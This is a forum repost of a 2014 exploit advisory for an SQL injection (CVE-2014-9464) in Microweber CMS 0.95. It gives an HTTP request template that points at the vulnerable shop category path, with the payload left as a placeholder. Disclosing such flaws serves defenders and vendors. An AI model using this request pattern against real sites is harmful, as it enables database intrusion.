Microweber CMS 0.95 - SQL Injection

Aerosol · January 7, 2015

# Exploit Title: SQL Injection in Microweber CMS 0.95
# Google Dork: N/A
# Date: 12/16/2014
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: Microweber (https://microweber.com/)
# Software Link: https://github.com/microweber/microweber
# Version: 0.95
# Tested on: N/A
# CVE : CVE-2014-9464

::PROOF OF CONCEPT::

GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html
- https://www.youtube.com/watch?v=SSE8Xj_-QaQ
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464

::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

Source

Sign In

Microweber CMS 0.95 - SQL Injection

Recommended Posts

Aerosol

Join the conversation

Browse

Activity

Pages